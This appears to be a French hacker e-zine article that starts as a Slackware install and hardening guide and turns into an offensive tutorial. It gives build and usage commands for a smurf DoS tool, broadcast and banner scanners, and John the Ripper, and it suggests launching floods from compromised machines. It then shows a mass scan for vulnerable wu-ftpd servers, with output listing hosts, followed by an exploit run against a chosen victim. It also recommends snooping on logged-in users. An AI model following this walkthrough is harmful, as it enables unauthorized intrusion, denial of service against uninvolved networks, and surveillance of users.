Suse Linux ---> Http://www.suse.com
RedHat version Allemagne. - une grande parti des trous de securiter. Si
Vous voullez apprendre un peu avant d 'installer Slackware et vous
familliariser avec linux je vous conseille suse.
Winlinux ---> Http://www.winlinux.net
s'install a partir un install wizard de windows, detecte la plus par du
hardware et finalement vous transforme en geranium.
Unbind Linux ---> Http:/www.unbind.qc.ca
Distro securitaire quebecoise develloper par Securiweb. Encore au stade
pre-alpha. laisser unbind au develloper.
Bon, how i can install linux, enfin ce que nous cherchions. Le site
nous propose une panoplie de text sur l'installation de linux. notons
cela, on pourras toujours y revenir plus tars si on a de la misere avec
notre installation.
Il ne reste plus qu'a trouver linux avant de se lancer dans l'aventure
de se nouveau OS, Les differents site propose de le downloader... ouf
ca peu etre long...tien on peu aussi commander des CD, ce qui veut dire
qu'on risque d'etre oubliger de voler un petit vieu, ou de vendre des
bouteile vide (le prix de shiping du CD est cependant pratiquement
toujours resonable, avec 20$ on peu meme se payer SUNOS-i386). C'est
bien beau, mais moi jai pas envie dattendre tout se temps la...
pour commander votre cd de linux
http://www.cheapbytes.com
Heureusement il existe d'autre methode, et la je parle pas de payer 80$
et se payer red hat au compucenter. Tant qu'a ca, aller dans une
librairie et acheter un book de linux qui fournie une distro. Vous
allez debourser 60$ mais au moin vous allez avoir un ami qui va vous
aider le temps que vous pourrez pas aller demander de l'aide virtuelle
sur linuxqc (je dit virtuelle pcq il vont vous dire daller lire les
howto (je reviendrais au howto plustard)). Si vous avez ni temps ni
argent, allez squatter les hotspot de revue, beaucoup offre les
derniere distro de linux, ex: le planete linux #5 (de janvier2k) offre
leur version traduite de slackware. Une autre alternative est de vous
trouver un ami patate qui provide de la technologie (voir un certain
article de Qwzykx sur la scene vue par le Star Control-o-vision).
Maintenant que nous avons notre CD linux (ceux qui l'on pas encore non
pas le droit de lire le reste de l'article nanana). Vous etes maintenant
pret. Pret a faire de la place sur votre HD (putain on l'installera
jamais linux si sa continue). je vous conseille pour cette operation
de denicher l'exelent partition magic 5. Faite une partition linux ext2
et une partition linux swapp (d'environs la meme grosseur que votre
memoire ram). la swapp sert de memoir virtuelle. votre OS envois en
swapp ce que vous vous servez moin souvent (dans le cas de win2k et de
linux) ou lexedent de memoir (nimporte quoi qui depasse la capaciter de
votre ram, dans le cas de win9x). La swapp est evidament moin rapide
que votre RAM, mais demeure cependant plus avantageux que de ne pas
avoir de swapp dutout. Surtout ne faite pas 2 partitions primaire,
votre windows refuseras de vous ecoutez par la suites, installer linux
sur une partition etendu)
First boot, Comme j'ai mon CD (et vous aussis si vous etes pas dans le
genre cheap). On va l'utiliser pour effectuer notre premier boot de
linux. bye bye windows
Ctrl-atl-del
del del del del del del del del
nous voici a l'interieur de notre mighty bios. Et ici ca peu varier
enormement celon les versions de bios qui est utiliser sur votre carte
mere. Il en revient donc a vous de trouvez l'endroit et la facon dont
vous pouvez mettre le CDrom dans l'ordre du boot. Ne vous en faites pas
trop, seulement les tres vieux bios ne possede pas cette option (les
CDrom on commencez a etre populaire au temps des 486). Peu importe la
distribution que vous installez, il utilisera une image du kernel de
linux sur le cd (vmlinuz) afin que vous puisser effectuer
l'installation de linux. Le reste des installations different en gros
que par le menu d'installation et des options offertes. Je parlerais
ici de l'installation d'une Slackware (distribution recommender par
IGA)
attendez que le tout se laod et lorsque vous arriverez au prompt. tapez
ROOT(votre premiere box rooter, et cest la votre, felicitation).
ensuite faite cfidsk et rendez votre partition ext2 bootable si elle ne
l'est pas dejas un coup fait, sauvegarder la table de partition avant
de quittez l'application cfdisk. Et maintenant on est pret pour le
terrible setup.
etape a faire
1) mounter la swapp (selectionner loption, il va vous demander quel
partition vous desirez monter comme swapp, (en vous fesant une
suggestion que je vous conseille decouter si vous n'avez pas pris vos
partition en note).
2) indiquer sur quel file systeme installer linux et le formater (ne
choisisser pas loption longue si vous s'avez que votre hd est correct.
vous risqueriez dit passer la nuit.
3) selection des packages a installer, ici slack propose quel groupe
de package vous desirez avoir (le kernell, devellopement, xwindows,ect)
vous pourrez choisir plus specifiquement plus tard. la seul
recommandation que je puisse vous faires pour linstant est de ne pas
installer xwindows si vous manquez despace. X install toujours un tas
de chit sur votre ordi, et je ne saurais vous conseillez meme si vous
disposer de plusieur gig de l'installer par apres de facon propres.
4) installation des packages determiner au prealable. pour chaque series
de package slack vous demanderas celle que vous desirez installer.
enlever ce que vous voyez de superflu (ex le support scsi si vous ne
disposer pas de scsi).
5) configuration. set d'un mot de pass pour le ROOT. Detection de votre
modem (si vous en avez un). installation de votre reseau (vous pourrez
y revenir plus tard a laide de la commande netconfig (root only). Bref
comme je ne sais pas ce qu'il y a dans votre ordi, je ne peu pas vous
etres d'un grand aide a ce moment. un coup linstall fini, si vous n'etes
pas capable d'acceder a internet. allez sur #linuxqc et faites vous
dires daller lire le howto. ou encore allez sur #iga-unix pour avoir une
aide respectable.
6) configuration du lilos. installer le dans le MBR (master boot record)
sans lui il vous serat impossible de booter sans bootdisk. indiquer que
vous avez une partition linux et sur quel parti (/dev/hda5 par exemple,
mais verifiez bien avant de marquer nimporte quoi, car vous ne pourrez
pu booter (a moin de rebooter avec le cd et de reinstaller le lilos). De
toute facon slackware a la joyeuse idee de vous dire quoi marquer (il
faut le marquer, peser pas sur enter tout de suite comme un pauvre
dadais). et indiquer aussi que vous possedez une partition dos (si vous
avez garder windows bien sur). sauver le lilos, et vous pouvez mainteant
quitez le setup et rebooter, en enlevant le cdrom du boot sequence (dans
le bios). ou encore du moin enlever le cd de slack de votre cd-rom il
est maintenant temps pour vous de booter a partir de votre hd (wow, quel
sentiment de reussite.
newbox login :
il n'y a qu'un user pour linstant, alors a loging marquer root, et je
vous souhaites que vous vous souveniez de votre mots de pass.
im too young for being rooted. papahamster help me pleaze.
il faut maintenant securiser cette box de facon minimal. Un facon simple
de securiser une box temporairement contre la categorie de hacker QHA
est de simplement fermer c'est service. En effet, on ne peu rentrer a
quelque par si il n'y a pas de porte, ni fenetre, nous n'allon laisse
que le telnet ouvert pour des raisons pratiques. dans le repertoir /etc.
et allon editer a laide de pico (ou de votre editeur de text preferer)
le fichier inetd.conf de la facon suivante :
mettre en commentaire "#" ces lignes :
#ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -l -i -a
#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
#comsat dgram udp wait root /usr/sbin/tcpd in.comsat
#shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#ntalk dgram udp wait root /usr/sbin/tcpd in.talkd
#pop3 stream tcp nowait root /usr/sbin/tcpd in.pop3d
#imap2 stream tcp nowait root /usr/sbin/tcpd imapd
#finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -u
vous pourrez toujours les reactivez plus tard si le besoin sent fait
sentir, ce qui devrais surtout etre le cas pour le FTP. bon, apres
enlever le "#" devant la string suivante :
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetsnoopd
ca va vous permetre de regarder ce que font les user connecter a votre
box (port 23) a l'aide de la commande ttysnoop ttyX (X represente le
numero du tty sur lequelle la personne que vous desirer espionner c'est
connecter. Ensuite diriger vous vers /etc/rc.d , nous allons couper
quelque deamon non util. encore a l'aide de pico, editer le fichier
rc.inet2 . Si vous ne possedez pas d'imprimante (ou si vous ne
prevoyer pas en utiliser sous linux commanter les lignes suivante (#):
#IN_SERV="lpd"
#LPSPOOL="/var/spool/lpd"
rebooter, regarder les deamons qui se start ( vous pouvez les voirs
dans la sequence de boot avant d'arriver au login ). notez les, et
couper les tous (#) a par inetd et syslogd. Il sagit d'une facon drastique
dobtenir une securiter convenable sur une box. Des moyens plus
professionnelle et plus efficaces vous seront communiquer dans des
articles post dater (like, dans un prochain iga).
troubleshooting : lilo a laire fucked up
si vous ne pouvez rien ecrire au lilo, essayer de peser sur ctrl ca
devrais arranger le probleme, sinon sauter un peu partout dans votre
chambre et tirrer vous par la fenetre.
troubleshooting : mini mini dhcp howto
vous avez un modem cable, vous ne savez pas comment le faire marcher.
faite ce qui suit
cd /etc/rc.d ( les fichiers config de votre linux sont situer dans /etc
pico rc.inet1
aller changer la ligne
dhcp "no"
pour
dhcp "yes"
ctrl-x (pour sortir et sauvez)
retourner a /etc ( en fesant cd ..)
pico resolv.conf
ajouter les nameservers de votre ISP cable, dans le cas de videotron
il sagit de 205.151.222.250 et 205.151.222.250 pour les ajouter dans le
resolv.conf il vous suffit a l'interrieur du fichier dajouter les 2
lignes suivantes :
nameserver 205.151.222.250
nameserver 205.151.222.251
ctrl-x
rebooter, et vous devriez voir lors du reboot la phrase suivant
triying to config eth0 by connection DHCP server..
troubleshouting : ou est passer ma carte de son
pour configurer votre carte de son, editer le fichier rc.modules qui se
trouve dans le repertoire /etc/rc.d dessender jusqu'a la ligne suivante:
### Sound support ### et enlever le (#) devant votre carte de son, si
ignorer quel est la marque de votre carte de son, essayer le premier
(sound blaster) c'est le plus standart, sinon, essayer les autres un
apres lautre, si apres ca sa ne marche toujours pas essayer davoir plus
d'information sur votre carte et contacter le producteur.
troubleshooting : gregory ma vendu une ati rage 128
1) kill the bastard
2) bien camoufler le cadavre de gregory dans une benne a ordure
3) se rendre sur le site de suse
4) prendre le rpm destiner a la ATI rage 128
5) downloader la, vous pouvez faire loperation en windows, si vous n'etes
pas habituer avec lynx, ou si encore vous n'avez pas reussi a reacher
internet a partir de linux, booter ensuite en linux, faite un
repertoire host et ensuite mounter votre partition windows
mkdir windows ( a partir de votre /home/vous genre )
su (entrer votre passe root)
mount /dev/hda1 (votre partition windows) /home/vous/windows
vous aurez ainsi droit daccess a tout votre partition windows
copier le fichier xsvga_f86.rpm dans votre repertoire racine (/)
aller le rejoindre (cd /) et installer le rpm. comme nous nutilisont
pas suse (du moin si vous avez installez slack telle que IGA vous
recommande) il se peu que les dependances ne fonctionne pas (rpm
verifie que les dependances installer via rpm) donc utiliser la
commande suivante
rpm -i --nodep xsvga_f86.rpm
il ne vous reste plus qua configurer votre Xwindows a l'aide de
XF86Setup (une version visuelle du desuet XF86Config).
____ ,-------------------------------------------------
/ \ | fstab tips
| _ | |
| / \ | | un moyen d'automatiser le mount d'une partition
|| | | / windows lors du startup de linux est de faire
(.) (.)| / comme qui suit
|| | | <__
|| | | | | en root utiliser cfdisk pour connaitre votre
|| | | | | partition windows, ensuite aller dans /etc et
|____/|| | | editer le fichier fstab en ajoutant cette linge
|\___/ | | |
|| | | | | /dev/hdaX /home/wyzeman/windows vfat defaults 0 0
|| | | | | ou X est une variable a remplacer par le chiffre
|| | | | | qui represente votre partition fat32 que vous
|| | | avez pu obtenir a laide de la commande cfdisk
| \___/ | precedament utiliser.
| |
\______/
.------------,
| |
; . |
\ /
\ . /
\______/
,------, .-------.
| | / \
|__ ___; / \
|( 0 )_( 0 )|
,------, ,------, ,--- -,| / \ |---, ,----, ,----, ,----, ,----,
| | | | | | .-' '-. | . ; | | | | \ \ / /
; | | | | . /||\ /| |\ | | ; | . | \ . ' / /
| . ; | ; | / | \____/ | \ | | . | | | \ \ / . /
| | | . | | / / \ \ ; | ; | \ \/ /
' | ; | ; / / __ __ \\ \ | | | | IGA IS NOW
| | | . | | / // |\ \ .| | . | \ /
| | | | / // | | | | | ; POWERED BY LINUX
| . ; | |_/ ( | | | | | ; | | / \
| | ; . ( \ \| | | | / ) | | | Let's fun begin
| |_____ _) \ \ |(__)(_ |_ ___| | / /\ \
; | ( \__) / / ) . | /. / \ '
| . ; _) \ \___________/ / (_ . ; / / \ \
| |( | | ) . | / / ' . \
| ___ ______| '''-.__)\____________/(___.-''' ____ ______| /____/ \____\
| |
; . |
\ |
\___;
Yahou, j'ai linux, je n'est plus que une seul idee en tete,
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK HACK
Une banque se vole pas sans preparation et equipement, un hack non plus
nous allons donc passer voir le magazinier
need's gun's, lot's of gun's.
Et ce magazinier se trouve a www.packetstorm.securify.com en majeur partit
voici la liste de quoi vous procurer suivie du lynk ou le trouver. Un
autre hot spot en matiere de DoS/Xploit/hacktool est ftp.technotronic.com
papasmurf: http://packetstorm.securify.com *chercher dans archives* (un
outils de survie)
broadscan: http://packetstorm.securify.com *chercher dans archives* (un
scanner de broadcast pour le smurf)
vetescan : http://www.self-evident.com/ (un scanner de vulnerabiliter)
grabbb : http://packetstorm.securify.com *chercher dans archives* (un
scanner de banner )
john the : http://packetstorm.securify.com (un cracker de password)
riper
Xploits : ftp.technotronic.com/unix
____ ,-------------------------------------------------
/ \ | Midnight commander tips
| _ | |
| / \ | | MC vous est presenter comme etant diviser en 2
|| | | / la premiere partie representant le repertoire
(.) (.)| / source et le second le target. vous pouvez
|| | | <__ naviger entre les 2 a l'aide de la commande tab
|| | | | | pour copier un fichier du source au target,
|| | | | | selectionner le fichier (a l'aide des fleches)
|____/|| | | et appuyer sur F5, pour quiter MC faite F10
|\___/ | | | (classic du bon vieu temps). ou taper quit dans
|| | | | | le command line (en dessous des 2 screen).
|| | | | |
|| | | | |
|| | |
| \___/ |
| |
\______/
Comment faire fonctionner tout ce belle attirail de guerre ? premierement
vous devez compilez les .c a l'aide de la commande gcc file.c -o file
(ca donne gcc papasmurf.c -o smurf). ensuite deziper les .tar.gz a l'aide
de la commande tar xvfz fichier.tar.gz allez dans les repertoirs creer et
faite le rituelle ./configure, make, make install. pour Vetescan il faut
faire un gerne de tweet, qui va comme suit:
tar xvfz VeteScan-04-01-2000.tar.gz (dans le repertoir /)
cd vetes
./install
./install-components
./install-docs
./install-netcat
./install-nmap
cd /bin
ln /vetes/vete -s vete
L'installation de john differe aussi un tantinet des standarts imposer
dans le domaine, il en va comme suit :
tar xvfz john-1.6.tar.gz
cd john-1.6
make (prenez dans la liste celui qui ressemble le plus a votre
configuration hardware)
make linux-x86-mmx-elf (dans mon cas a moi, un celeron400)
Bon, maintenant que vous avez votre mitraillette thompson pi vos night
goggles, on va apprendre a utiliser tout ca :]
papasmurf : ./smurf ip broadcast list -S 1024 -d 0
(ici on prend en compte que vous avez compiler papasmurf sous le nom de
smurf)
les options -S et -d ici indique la grosseur et la frequence des pacquets
envoyer. il sagit ici d'une configuration optimal. Je vous conseille de
lancer vos smurf a partir de box que vous aurez hacker, vous allez ainsi
beneficier d'une plus grand par de bandwidth (a moin bien sur que vous
haxoriser des box sur des 28.8 :]).
Broadscan : ./broadscan 200 10
il va scanner pour 200.10.x.x afin de trouver des broadcast utilisable
pour le smurf et sauvez le tout dans un fichier du nom de broadcast.txt.
Vetescan : vete ip fichier.log
vetescan va alors faire un tour rapide des vulnerabiliters du ip que vous
lui avez donner, et vous faire un rapport ou il ne vous resteras plus
qua aller chercher l'exploit correspondant (regarder bien le log vetescan
a sa propre db d'exploit et il va vous indiquer ou se trouve le source
si il le possede.
grabbb : ./grabbb -a 1.1.1.1 -b 200.200.200.200 21 > scan.txt
a represente le start ip et b le end ip (le range finalement) et ici nous
scannons le port 21 (a la recherche un wu-ftp2.4.2 (2.5.0) p-e :]) et le
tout est rediriger en sorti dans un fichier du nom de scan.txt
john : taper ./john, vous allez avoir la liste des options
Usage: ./john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3
en general ./john passfile.txt (la ou vous avez sauvez le passwd) fonctionne
asser rapidement, si vous etes maniaque, utiliser loption -incremental il va
commencer a 0 et finir a zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz (enfin lorsqu'il
aura tout trouver). loption -show est interessante. Bref c'est le bon vieux
john the ripper qu'on peu aussi trouver pour les windows like.
Bon armee comme un lemurien, nous allons nous attaquer a notre premiere
cible, ho rien de bien gros pour linstant. l'astuce c'est de se pogner
quelque box parsemer a travers le monde pour runner quelque app (smurf, bnc)
et de pouvoir se bouncer pour des hack plus determiner. Comment alons nous
proceder ? par la methode facile, au lieu de trouver un hole sur un host
donnee, on va se trouver un exploit sympa et on va scanner voir qui est
vulnerable. Dailleur pour l'instant notre but est de trouver des box, donc
on se fou pas mal de qui sera notre victime. Nous seront sophistiquer en
temps et lieu. Quelque chose de facile, vous vous souvenez sans doute de
l'article de G463 en free style sur le Wuftpd ?? Ben moi oui :]
alors armons nous de patience et d'un scanner (tien grabbb) et tapon ce qui
suit dans un tty (ou un terminal)
./grabbb -s -v -a 105.251.1.1 -b 105.251.100.255 > wuftp.txt
et attendons patienment, allons au depaneur, prendre un grand pepsi 2litre
et un doritos flambant rouge. et revenons tout penard voir le resultat de
no scann :
pico wuftp.txt
1 ports to scan per host, thats 25855 connects
105.251.102.3:21: 220 cacheraq01 FTP server (Version wu-2.5.0(1) Mon May 31 21:08:32 PDT 1999) ready.
105.251.103.1:21: 220 mir FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
105.251.106.11:21: 220 FTP server ready.
105.251.106.12:21: 220 FTP server ready.
105.251.106.13:21: 220 FTP server ready.
105.251.106.18:21: 220 FTP server ready.
105.251.106.19:21: 220 FTP server ready.
105.251.106.81:21: 220 FTP server ready.
105.251.106.27:21: 220-Welcome
105.251.106.15:21: 220-Welcome
105.251.106.17:21: 220-Welcome
105.251.106.40:21: 220-Welcome
105.251.106.70:21: 220-Welcome
105.251.112.3:21: 220 assnat.qc.ca FTP server ready.
105.251.116.25:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.24:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.26:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.27:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.29:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.28:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.31:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.30:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.141:21: 220 azimutweb1 Microsoft FTP Service (Version 4.0).
105.251.116.140:21: 220 azimutweb1 Microsoft FTP Service (Version 4.0).
105.251.116.142:21: 220 azimutweb1 Microsoft FTP Service (Version 4.0).
105.251.116.143:21: 220 azimutweb1 Microsoft FTP Service (Version 4.0).
105.251.116.145:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.144:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.147:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.146:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.16:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.148:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.17:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.149:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.151:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.150:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.153:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.152:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.21:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.18:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.20:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.19:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.23:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.22:21: 220 cartman.mediawave.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.116.154:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.116.155:21: 220 sporades Microsoft FTP Service (Version 4.0).
105.251.117.229:21: 220 delnav_server Microsoft FTP Service (Version 3.0).
105.251.118.8:21: 220 Prnagmt Microsoft FTP Service (Version 4.0).
105.251.118.117:21: 220 Serv-U FTP-Server v2.1 for WinSock ready...
105.251.118.207:21: 220 saurion.tolkien.cum.org FTP server (Version 6.00) ready.
105.251.118.193:21: 220 saurion.tolkien.cum.org FTP server (Version 6.00) ready.
105.251.125.133:21: 220 wwwcsa Microsoft FTP Service (Version 3.0).
105.251.125.129:21: 220 liste.csaffluents.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.125.132:21: 220 liste.csaffluents.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.125.134:21: 220 liste.csaffluents.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.125.140:21: 220 liste.csaffluents.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.125.143:21: 220 wwwcsa Microsoft FTP Service (Version 3.0).
105.251.125.144:21: 220 wwwcsa Microsoft FTP Service (Version 3.0).
105.251.125.141:21: 220 3millenaire Microsoft FTP Service (Version 3.0).
105.251.125.147:21: 220 liste.csaffluents.jp FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.125.154:21: 220- 3saisons WAR-FTPD 1.65 Ready
105.251.125.189:21: 220 wwwcsa Microsoft FTP Service (Version 3.0).
105.251.125.190:21: 220 wwwcsa Microsoft FTP Service (Version 3.0).
105.251.125.188:21: 220 liste.csaffluents.qc.ca FTP server (Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999) ready.
105.251.162.2:21: 220 ppp2 FTP Server for NW 3.1x, 4.xx (v1.10), (c) 1994 HellSoft.
105.251.162.6:21: 220-AppleShare IP FTP Server; Service Ready
105.251.162.10:21: 220 teleducation-01 Microsoft FTP Service (Version 4.0).
220 105.251.162.15:21: 220 web FTP server (Version wu-2.4.2-VR16(1) Sat Apr 10 11:30:45 CDT 1999) ready.
105.251.164.150:21: 220 stlouis.cusoq.cum FTP server (Version wu-2.6.0(2) Sun May 7 22:06:32 EDT 2000) ready.
105.251.190.112:21: 220 webbit FTP server (SunOS 5.6) ready.
105.251.190.215:21: 220 tundra.lab.digidyne.cum FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
105.251.192.194:21: 220-Serv-U FTP-Server v2.5b for WinSock ready...
220-| all I ask.105.251.193.60:21: 220 cons0007 IBM TCP/IP for OS/2 - FTP Server ver 09:39:01 on Mar 03 1995 ready.
105.251.193.45:21: 220 server Microsoft FTP Service (Version 3.0).
105.251.193.242:21: 220 am_nt1 Microsoft FTP Service (Version 4.0).
105.251.193.13:21:
105.251.193.250:21: 220 internet Microsoft FTP Service (Version 3.0).
105.251.194.27:21: 220 fortuna Windows NT FTP Server (Version 3.51).
105.251.194.58:21: 220 g24-243 Microsoft FTP Service (Version 3.0).
105.251.194.16:21: 220 gate.proma.com FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
105.251.194.39:21: 220-Proxy first requires authentication
220 airware1 FTP proxy (Version V2.1) ready.105.251.194.240:21: 220 ramnet_server Microsoft FTP Service (Version
3.0).
105.251.195.42:21: 220 www.canstock.net FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
105.251.195.39:21: 220 hades.demonsys.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Wed Jul 15 19:54:38 EDT
1998) ready.
105.251.195.36:21: 220 dreadnought.demonsys.net FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT
1999) ready.
105.251.195.37:21: 220 dreadnought.demonsys.net FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT
1999) ready.
105.251.195.52:21: 220 retail1.retailcanada.net FTP server (Version 6.00) ready.
105.251.195.54:21: 220 cti07.citenet.com FTP server (Version wu-2.4.2-academ[BETA-18](1) Wed Oct 14 03:16:57 GMT 19
98) ready.105.251.195.165:21: 220 ers006 Microsoft FTP Service (Version 4.0).
105.251.195.196:21: 220 plato Microsoft FTP Service (Version 4.0).
105.251.198.66:21: 220 msproxy Microsoft FTP Service (Version 3.0).
105.251.198.93:21: 220 crsbpl FTP server (Digital UNIX Version 5.60) ready.
105.251.198.59:21: 220 father FTP server (SunOS 5.7) ready.
105.251.198.146:21: 220 popa Microsoft FTP Service (Version 4.0).
105.251.198.162:21: 220 ftp.catalpadesign.net FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT
1998) read$105.251.198.74:21:
105.251.199.129:21: 220- bh proxy-ftp [v3.1] ready
220 Please enter your userid105.251.199.133:21: 220 ftp.energies.alstom.ca FTP server (NcFTPd 2.2.2) ready.
105.251.199.201:21: 220 web_recyc2 Microsoft FTP Service (Version 4.0).
105.251.199.202:21: 220 web_recyc2 Microsoft FTP Service (Version 4.0).
105.251.199.203:21: 220 web_recyc2 Microsoft FTP Service (Version 4.0).
105.251.199.204:21: 220 web_recyc2 Microsoft FTP Service (Version 4.0).
finished scanning 25855 hosts.
got 102 responses from 171 hosts.
bon quesqui nous interresse la dedans pour linstant ? fait un cat wuftp.txt |grep academ
205.151.195.39:21: 220 hades.demonsys.com FTP server (Version wu-2.4.2-academ[BETA-17](1) Wed Jul 15 19:54:38 EDT
1998) ready.
205.151.195.54:21: 220 cti07.citenet.net FTP server (Version wu-2.4.2-academ[BETA-18](1) Wed Oct 14 03:16:57 GMT 19
205.151.198.162:21: 220 ftp.catalpadesign.com FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT
1998) ready
alon maintenant faire un tour a ftp.technotronique.com voir ce qu'il ont
a nous offrire contre le wuftp2.4.2 (si on a pas dejas lexploit en main)
compilon le et essayons le,
gcc wu-ftpd-exp.c -o wuftp1
bon esssayons le maintenant
Skynet:~/hack/xploit# ./wuftp1
usage: ./wuftp1 <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]
hum bon maintenant essayons cette exploit sur notre victime cible soit le
205.151.195.39
./wuftp1 205.151.195.39 /home/ftp -l anonymous -p a@b.c
dammit ca marche pas :] . c'est le genre de chose qui arrive 2foit sur 3 et
du au manque du houblons et de temps que la conception de iga 15 nescessite je
me doit de marreter sur cette echec. mais ce n'est que une bataille de perdu et
non la guerre donc sur cette premiere darticle de hack qui ne fonctionne pas ou
j'ai lair un peu con je l'admet, je me doit de vous dire a la prochaine. je vous
reviendrez avec un peu plus de technique et de temps de preparation. ne vous
sentez surtout pas dessus, au moin vous aurez apris a installer linux et a le
securiser de maniere potentiellement potable, il ne vous reste plus qua prendre
votre mal en patience et attendre la prochaine parution de IGA ou vous pourrez
suivre a nouveau levolution de pseudo-wyze :]
en attendant je vous conseille dessayer, l'exploit w00f.c pour hacker les wuftpd
vous obtiendrez peu etre de meilleur resultat que cette tentative manquer
ps jai essayer les autre host (les vrai ne parraisse pas dans larticle evidament
et j'en suis arriver au meme resultat, je mexcuse de mettre pris a la derniere
minute. Mais vous aurez apris un concept important, c'est pas pcq on a compiler
un exploit qu'on est rendu Dieu :]
a bientot chez amis
et surtout ne vous decouragez pas si vous n'y arrivez pas tout de suite, ca
arrive meme au meilleur :]
____ ,-------------------------------------------------
/ \ | laugh out loud
